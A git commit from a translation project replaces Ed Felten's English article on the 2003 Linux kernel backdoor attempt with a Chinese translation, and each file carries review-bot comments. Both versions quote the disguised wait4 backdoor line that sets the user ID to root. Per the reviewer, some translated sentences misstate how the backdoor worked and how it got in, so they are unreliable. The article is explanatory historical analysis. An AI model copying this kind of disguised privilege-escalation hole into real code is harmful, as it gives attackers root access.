Translated by 小眼儿

Signed-off-by: tinyeyeser <tinyeyeser@gmail.com>
tinyeyeser 2013-10-11 16:20:51 +08:00
parent 6cae1f794f
commit b2f001b1de
2 changed files with 46 additions and 46 deletions


@ -1,46 +0,0 @@
The Linux Backdoor Attempt of 2003
==================================
Josh [wrote][1] recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.)
Today I want to write about another [incident][2], in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we dont know who it was that made the attempt—and we probably never will.
Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.
But some people didnt like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.
But on Nov. 5, 2003, Larry McVoy [noticed][3] that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.
What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]
A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.
Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … its a classic backdoor.
This is a very clever piece of work. It looks like innocuous error checking, but its really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.
But the attempt didnt work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.
Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, well never know.
---
via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
本文由 [LCTT][] 原创翻译,[Linux中国][] 荣誉推出
译者:[Mr小眼儿][] 校对:[校对者ID][]
[LCTT]:https://github.com/LCTT/TranslateProject
[Linux中国]:http://linux.cn/portal.php
[Mr小眼儿]:http://linux.cn/space/14801
[校对者ID]:http://linux.cn/space/校对者ID
[1]:https://freedom-to-tinker.com/blog/kroll/software-transparency-debian-openssl-bug/
[2]:https://lwn.net/Articles/57135/
[3]:https://lwn.net/Articles/57137/
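Review bot: the two code lines `if ((options == (__WCLONE|__WALL)) && (current->uid = 0))` and `retval = -EINVAL;` in the removed file are plain paragraph text, so a Markdown renderer joins them onto one line and may treat the `__` sequences as emphasis; since the whole article turns on the one-character difference between `= 0` and `== 0` on that line, the snippet should be an indented or fenced code block in whichever copy of this file is kept. The removed text has also lost its apostrophes throughout (`dont`, `didnt`, `its a classic backdoor`, `well never know`), which reads as an encoding loss worth repairing in the source before it is translated.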


@ -0,0 +1,46 @@
揭秘!—— 2003年Linux后门事件
==================================
最近Josh写了[一篇文章][1]讲述2006年Debian Linux中出现的一系列安全bug探讨了这些所谓bug是否是NSA植入的后门。最后他作出结论可能不是
今天我想讲述的是另外一个[事件][2]——2003年某些人试图在Linux内核中植入后门的故事。这次事件很明确的确有人想植入后门只是我们不知道此人是谁而且也许永远都不会知道了。
时间回到2003年当时Linux使用一套叫做BitKeeper的系统来存储Linux源代码的主拷贝。如果开发者想要提交一份针对源码的修改就必须经过一套严格的审核过程以决定这份修改是否能够合并进主拷贝。每个针对主拷贝的修改都必须附带一段说明说明当中都包括了一个记录相应审核过程的链接。
但是有些人不喜欢BitKeeper于是这些开发者们就用另一套叫做CVS的系统维护了一份Linux源代码的拷贝这样他们就能随时按自己喜欢的方式获取Linux源代码了。CVS中的代码其实就是直接克隆了BitKeeper中的代码。
但是在2003年11月5日的时候Larry McVoy[发现][3]CVS中的代码拷贝有一处改动并没有包含记录审核的链接。调查显示这一处改动由陌生人添加而且从未经过审核不仅如此在BitKeeper仓库的主拷贝中这一处改动竟然压根就不存在。经过进一步调查后可以明确显然有人入侵了CVS的服务器并植入了此处改动。
神秘人物究竟做了哪些改动这才是真正有趣的地方。改动修改的是Linux中一个叫wait4的函数程序可以使用该函数进行挂起操作以等待某些事件的触发。神秘人物添加的就是下面这两行代码
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
[有C语言编程经验的人也许会问这两行代码有什么特别的请接着往下看]
猛地一看好像这两行代码就是一段正常的错误校验代码当wait4函数被某种文档中禁止的方式调用时wait4就返回一个错误代码。但是一个真正认真的程序猿立刻就会发现代码中的问题注意看在第一行末尾“= 0”应该是“== 0”才对。是的“== 0”在这里才是判断当前运行代码的用户ID(current->uid)是否等于0而“= 0”不但无法判断反而修改了用户ID的值将其值赋值为0。
将用户ID设置为0这是一个很严重的问题因为ID为0的用户正是“root”而root账户可以在系统中做任何事情包括访问所有数据、修改任意代码的行为能够危及到整个系统各个部分的安全。因此这段代码的影响就是通过特殊手段使得任何调用wait4函数的软件都拥有了root权限。换句话说这就是一个典型的后门。
客观地说,这一招很漂亮。看起来就像是无关紧要的错误校验,但真是身份却是一个后门。而且它混在其他经过审核的代码中间,几乎规避了所有审核可能会注意到自己的可能性。
但是它终究还是失败了因为Linux小组有足够强的责任心注意到了CVS仓库中的这段代码没有经过常规审核。Linux还是略胜一筹。
这是NSA干的吗只能说有可能。因为有太多拥有技术能力和动机的人有可能实施了此次攻击。那么到底是谁呢除非某些人主动承认又或者发现新的确凿证据否则我们将永远不会知道。
---
via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
本文由 [LCTT][] 原创翻译,[Linux中国][] 荣誉推出
译者:[Mr小眼儿][] 校对:[校对者ID][]
[LCTT]:https://github.com/LCTT/TranslateProject
[Linux中国]:http://linux.cn/portal.php
[Mr小眼儿]:http://linux.cn/space/14801
[校对者ID]:http://linux.cn/space/校对者ID
[1]:https://freedom-to-tinker.com/blog/kroll/software-transparency-debian-openssl-bug/
[2]:https://lwn.net/Articles/57135/
[3]:https://lwn.net/Articles/57137/
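Review bot: the sentence 因此这段代码的影响就是通过特殊手段使得任何调用wait4函数的软件都拥有了root权限 drops the condition the original states ("software that called wait4 in a particular way that is supposed to be invalid", i.e. the `options == (__WCLONE|__WALL)` check on the line above it); as written it claims every caller of wait4 gets root, which overstates the bug and loses the reason the code passes as innocuous error checking, so the qualifier should be restored. Likewise 而且它混在其他经过审核的代码中间 inverts the original ("slipped into the code outside the normal approval process"): the point is that the change bypassed review entirely, not that it hid among reviewed code. Smaller items: 真是身份 should read 真实身份; the 校对:[校对者ID][] placeholder and its link on the last lines are still unfilled; the added 揭秘!—— in the title is not in the source; and the two code lines should be indented or fenced so they render as code rather than being merged into one paragraph line.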